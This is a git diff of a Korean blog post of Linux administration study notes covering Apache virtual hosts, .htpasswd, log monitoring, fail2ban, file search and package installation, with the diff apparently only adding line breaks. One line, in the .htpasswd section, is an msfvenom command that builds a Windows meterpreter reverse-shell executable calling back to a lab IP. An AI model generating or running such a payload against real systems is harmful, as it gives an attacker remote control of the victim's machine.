--- a/_posts/2019-03-23-Linux_2.markdown
+++ b/_posts/2019-03-23-Linux_2.markdown
@@ -8,31 +8,32 @@ categories : unknown
 ---
 ## Virtual host: 하나의 도메인으로 여러 웹 사이트를 운영하는 기법
 ---
-필요조건 - 호스트가 하나거나 도메인이 하나인 경우에 여러 웹 사이트를 운영할 수 있다. (IP-based, Name-based, Port-based 기법 사용)
+필요조건 - 호스트가 하나거나 도메인이 하나인 경우에 여러 웹 사이트를 운영할 수 있다.  
+(IP-based, Name-based, Port-based 기법 사용)  
   
   
   
 ---
 ### IP-based 실습
 ---
-<VirtualHost 192.168.100.200:80>
- ServerAdmin admin@localhost
- DocumentRoot /var/www/xyz
- DirectoryIndex index.html
-<Directory /var/www/xyz>
- Order allow,deny
- Allow from all
-</Directory>
-</VirtualHost>
+<VirtualHost 192.168.100.200:80>  
+ ServerAdmin admin@localhost  
+ DocumentRoot /var/www/xyz  
+ DirectoryIndex index.html  
+<Directory /var/www/xyz>  
+ Order allow,deny  
+ Allow from all  
+</Directory>  
+</VirtualHost>  
   
   
   
 ---
 ### Round Robin, Load Balancing, Fault Tolerance
 ---
-http://192.168.100.129 -> kahn.edu homepage
-                   128 ->        "
-                   127 ->        "
+http://192.168.100.129 -> kahn.edu homepage  
+                   128 ->        "  
+                   127 ->        "  
   
 ---
   
@@ -49,11 +50,11 @@ http://192.168.100.129 -> kahn.edu homepage
 ---
 ## .htpasswd .htaccess
 ---
-> htpasswd -c /etc/httpd/conf/.htpasswd centos
-> htpasswd /etc/httpd/conf/.htpasswd ubuntu
+> htpasswd -c /etc/httpd/conf/.htpasswd centos  
+> htpasswd /etc/httpd/conf/.htpasswd ubuntu  
   
   
-startx -> 그래픽으로 보여주는 명령어
+startx -> 그래픽으로 보여주는 명령어  
 msfvenom -p windows/meterpreter/reverse tcp lhost=192.168.100.131 lport=1234 -f exe > /root/Desktop/shell.exe
   
   
@@ -62,34 +63,34 @@ msfvenom -p windows/meterpreter/reverse tcp lhost=192.168.100.131 lport=1234 -f 
 ### 실시간으로 네트워크를 감시하는 명령어 
 ---
 tail -f option! 
-tail -f /var/log/syslog
+tail -f /var/log/syslog  
   
-백트랙의 해킹도구가 되는 근거는 바로 promiscuous mode
-SNMP 네트워크 모니터링 
+백트랙의 해킹도구가 되는 근거는 바로 promiscuous mode  
+SNMP 네트워크 모니터링  
   
-*영원히 접근 못하게 막는 기법*
-jail2ban 
-fail2ban
+*영원히 접근 못하게 막는 기법*  
+jail2ban  
+fail2ban  
   
   
   
 ---
 ### 빈파일 만드는 명령어 
 ---
-touch
-echo > 
-ex) touch xyz
-ex) echo > xyzz
+touch  
+echo >  
+ex) touch xyz  
+ex) echo > xyzz  
   
   
   
 ---
 ### 파일찾는 명령어
 ---
-* find / -type f -name passwd (passwd파일을 찾고자 할때)
-* locate passwd 
-* which passwd (명령어를 찾을때는 which가 좋다)
-* whereis passwd (관리자들이 많이 쓴다)
+* find / -type f -name passwd (passwd파일을 찾고자 할때)  
+* locate passwd  
+* which passwd (명령어를 찾을때는 which가 좋다)  
+* whereis passwd (관리자들이 많이 쓴다)  
 * find /home -type f -size 0 -exec ls -l {} \; (find 시작위치 type 타입 size 크기 exec 명령어)
   
   
@@ -97,12 +98,12 @@ ex) echo > xyzz
 ---
 ### dpkg -i
 ---
-* Debian 계열의 Debian, Ubuntu는 파일이 *.deb이다.
-* dpkg -i *.deb로 설치한다.(별도로 이 *.deb파일을 다운받았을때)
-* apt-get install abc하면 abc파일을 설치한다.(바로 웹에서 다운받아서 설치할 때)
-* dpkg -r abc로 삭제한다.
-* RedHat 계의의 Fedora, CentOS는 파일이 *.rpm,*.tar.gz, *.tar.bz2 이다. 
-* tar xvfz *.tar.gz tar xvfj *.tar.bz2해서 설치한다.
+* Debian 계열의 Debian, Ubuntu는 파일이 *.deb이다.  
+* dpkg -i *.deb로 설치한다.(별도로 이 *.deb파일을 다운받았을때)  
+* apt-get install abc하면 abc파일을 설치한다.(바로 웹에서 다운받아서 설치할 때)  
+* dpkg -r abc로 삭제한다.  
+* RedHat 계의의 Fedora, CentOS는 파일이 *.rpm,*.tar.gz, *.tar.bz2 이다.  
+* tar xvfz *.tar.gz tar xvfj *.tar.bz2해서 설치한다.  
   
   
   
